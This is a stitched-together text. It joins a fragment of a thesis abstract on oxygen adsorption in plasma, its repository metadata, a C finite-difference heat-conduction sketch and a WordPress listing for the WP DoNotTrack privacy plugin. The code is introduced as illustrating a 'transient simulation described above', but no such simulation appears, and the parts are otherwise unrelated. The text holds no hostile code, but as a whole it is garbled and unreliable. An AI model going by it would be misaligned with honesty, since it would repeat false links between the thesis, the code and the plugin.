atmosphere influences the adsorption and desorption of oxygen occurring on surfaces. The adsorption and desorption of oxygen depend on a rate-determining step involving surface sites within a plasma atmosphere, similar to what is obtained for oxygen interacting with surfaces without a plasma atmosphere.
Language: en
Provenance: Received from ProQuest
File Size: 50 pages
File Format: application/pdf
Rights Holder: Alejandro Garcia
Included in: Engineering Commons
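As a rough illustration of the kind of transient simulation described above, the sketch below integrates the one-dimensional heat conduction equation through a slab with an explicit finite-difference (FTCS) scheme. The geometry, thermal diffusivity, boundary temperatures and boundary conditions are assumed placeholder values; this is not the thesis's packed-bed model or material data.

/* Minimal sketch: explicit 1-D transient conduction in a slab.
   All material properties, dimensions and boundary conditions below are
   placeholders, not the values or geometry used in the thesis. */
#include <stdio.h>

int main(void)
{
    const int    N      = 51;        /* number of grid nodes                  */
    const double L      = 0.03;      /* slab thickness, m (assumed)           */
    const double alpha  = 1.0e-5;    /* thermal diffusivity, m^2/s (assumed)  */
    const double T_hot  = 2504.0;    /* fixed hot-face temperature, K         */
    const double T_init = 298.0;     /* initial temperature, K                */
    const double t_end  = 900.0;     /* simulated time, s                     */

    double dx = L / (N - 1);
    double dt = 0.4 * dx * dx / alpha;   /* satisfies FTCS stability (Fo <= 0.5) */

    double T[51], Tnew[51];
    for (int i = 0; i < N; i++) T[i] = T_init;
    T[0] = T_hot;                        /* Dirichlet condition on the hot face */

    for (double t = 0.0; t < t_end; t += dt) {
        for (int i = 1; i < N - 1; i++)
            Tnew[i] = T[i] + alpha * dt / (dx * dx)
                           * (T[i + 1] - 2.0 * T[i] + T[i - 1]);
        Tnew[0]     = T_hot;             /* hot face held constant             */
        Tnew[N - 1] = Tnew[N - 2];       /* insulated far face (zero flux)     */
        for (int i = 0; i < N; i++) T[i] = Tnew[i];
    }

    printf("Temperature profile after %.0f s:\n", t_end);
    for (int i = 0; i < N; i += 10)
        printf("x = %.4f m  T = %.1f K\n", i * dx, T[i]);
    return 0;
}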
WordPress.org Plugin Directory
WP DoNotTrack
WP DoNotTrack stops plugins/themes from adding tracking code or cookies, protecting visitor privacy and providing performance and security benefits. Just install from your WordPress "Plugins | Add New" screen and all will be well. Manual installation is very straightforward as well:
1. Upload the zip-file and unzip it in the /wp-content/plugins/ directory
2. Activate the plugin through the 'Plugins' menu in WordPress
3. Configure on the admin page
Requires: 3.2 or higher
Compatible up to: 3.4.2
Last Updated: 2012-08-21
Downloads: 8,104
Ratings: 4.8 out of 5 stars
Support: 0 of 1 support threads in the last two months have been resolved.